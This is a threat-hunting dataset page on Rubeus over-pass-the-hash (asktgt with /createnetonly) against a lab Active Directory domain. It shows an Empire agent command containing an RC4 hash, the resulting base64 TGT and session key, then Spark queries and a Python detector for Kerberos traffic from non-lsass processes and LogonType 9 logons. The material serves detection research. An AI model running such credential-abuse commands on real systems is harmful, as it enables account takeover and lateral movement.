# Rubeus Elevated ASKTGT CreateNetOnly

## Metadata

| Field | Value |
|---|---|
| Author | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2019/03/19 |
| Modification Date | 2020/09/21 |
| Tactics | ['TA0006'] |
| Techniques | ['T1003.003'] |
| Tags | ['Over-Pass-The-Hash', 'Not Touching LSASS'] |
## Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching LSASS.
## Datasets Downloads

| Dataset Type | Link |
|---|---|
| Host | |
| Network | |
## Adversary View

```
(Empire: G6BYHU4F) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\Windows\System32\cmd.exe
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 4
(Empire: 4EH9PC5S) >

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Ask TGT

[*] Showing process : False
[+] Process          : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID        : 10064
[+] LUID             : 0x42e7ba4

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Target LUID : 70155172
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw
IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr
UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB
kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t
StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4
cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc
c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8
46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61
8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ
FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h
BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl
5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W
pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb
1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9
T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a
sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd
4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa
7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q
ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO
fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D
QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy
MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa
MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=

[*] Target LUID: 0x42e7ba4
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 11:03:07 PM
  EndTime               :  9/22/2020 9:03:07 AM
  RenewTill             :  9/28/2020 11:03:07 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  TqCSqXQzrd62vesN78SIDA==

..Command execution completed.
(Empire: 4EH9PC5S) >
```
## Explore Mordor Dataset

### Initialize Analytics Engine

```python
from openhunt.mordorutils import *
spark = get_spark()
```
### Download & Process Mordor File

```python
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
```

```
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
```
### Get to know your data

```python
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
```

```
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |526  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |394  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |353  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |284  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |226  |
|WORKSTATION6.theshire.local|security                                |4703   |214  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |175  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |169  |
|WORKSTATION6                |Windows PowerShell                      |800    |151  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |129  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |18     |103  |
|WORKSTATION5.theshire.local|security                                |4703   |87   |
|WORKSTATION6.theshire.local|security                                |4658   |64   |
|WORKSTATION5.theshire.local|security                                |4658   |62   |
|WORKSTATION5.theshire.local|security                                |4656   |52   |
|MORDORDC.theshire.local    |Security                                |5156   |44   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |43   |
|MORDORDC.theshire.local    |Security                                |5158   |34   |
|WORKSTATION6.theshire.local|security                                |4656   |32   |
|WORKSTATION6.theshire.local|security                                |4690   |32   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
```
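The dataset description and the adversary view above point at two host-side signals a defender can key on: a raw AS-REQ means a process other than lsass.exe opens a connection to the KDC on TCP/88 (Sysmon EventID 3), and `/createnetonly` leaves a Security 4624 logon with LogonType 9 (NewCredentials), the `LOGON_TYPE = 9` printed by Rubeus. The Python below is an added example, not code from the Mordor project or from this page; the field names it reads (EventID, Channel, Hostname, Image, DestinationPort, LogonType, TargetUserName) follow the flattened Sysmon and Security schema of Mordor JSON-lines files, and the events it scans are constructed here rather than taken from the dataset. Channel names are compared case-insensitively because, as the table above shows, the workstations log `security` while the DC logs `Security`.

```python
import json

# Constructed JSON-lines sample (not from the dataset). Backslashes are JSON-escaped.
SAMPLE_JSONL = r"""
{"EventID": 3, "Channel": "Microsoft-Windows-Sysmon/Operational", "Hostname": "WORKSTATION6.theshire.local", "Image": "C:\\Windows\\System32\\lsass.exe", "DestinationPort": 88, "DestinationIp": "10.0.0.1", "ProcessId": 700}
{"EventID": 3, "Channel": "Microsoft-Windows-Sysmon/Operational", "Hostname": "WORKSTATION6.theshire.local", "Image": "C:\\users\\sbeavers\\Desktop\\Rubeus.exe", "DestinationPort": 88, "DestinationIp": "10.0.0.1", "ProcessId": 5120}
{"EventID": 3, "Channel": "Microsoft-Windows-Sysmon/Operational", "Hostname": "WORKSTATION6.theshire.local", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationPort": 443, "DestinationIp": "203.0.113.10", "ProcessId": 4100}
{"EventID": 4624, "Channel": "security", "Hostname": "WORKSTATION6.theshire.local", "LogonType": 2, "TargetUserName": "sbeavers"}
{"EventID": 4624, "Channel": "security", "Hostname": "WORKSTATION6.theshire.local", "LogonType": 9, "TargetUserName": "sbeavers"}
not json, simulates a corrupt line that the loader must skip
"""

KERBEROS_PORT = 88
# Images expected to talk Kerberos on a domain-joined Windows host; extend per environment.
ALLOWED_KERBEROS_IMAGES = {"c:\\windows\\system32\\lsass.exe"}


def load_events(text):
    """Parse JSON lines into dicts, skipping blank and malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def kerberos_from_non_lsass(events):
    """Sysmon EventID 3 connections to TCP/88 whose source image is not an allowed Kerberos client."""
    hits = []
    for e in events:
        if e.get("EventID") != 3:
            continue
        if "sysmon" not in str(e.get("Channel", "")).lower():
            continue
        if e.get("DestinationPort") != KERBEROS_PORT:
            continue
        if str(e.get("Image", "")).lower() not in ALLOWED_KERBEROS_IMAGES:
            hits.append(e)
    return hits


def newcredentials_logons(events):
    """Security 4624 events with LogonType 9 (NewCredentials), the type /createnetonly produces."""
    return [
        e for e in events
        if e.get("EventID") == 4624
        and str(e.get("Channel", "")).lower() == "security"
        and e.get("LogonType") == 9
    ]


def summarize(events):
    """Return findings as (rule, hostname, detail) tuples for triage."""
    findings = []
    for e in kerberos_from_non_lsass(events):
        findings.append(("kerberos_from_non_lsass", e.get("Hostname", "?"), e.get("Image", "?")))
    for e in newcredentials_logons(events):
        findings.append(("newcredentials_logon", e.get("Hostname", "?"), e.get("TargetUserName", "?")))
    return findings


SAMPLE_EVENTS = load_events(SAMPLE_JSONL)

if __name__ == "__main__":
    for finding in summarize(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

On real data the lsass.exe rule is the higher-signal one; LogonType 9 also fires for legitimate `runas /netonly` use, so it is best treated as context to pair with the network hit on the same host.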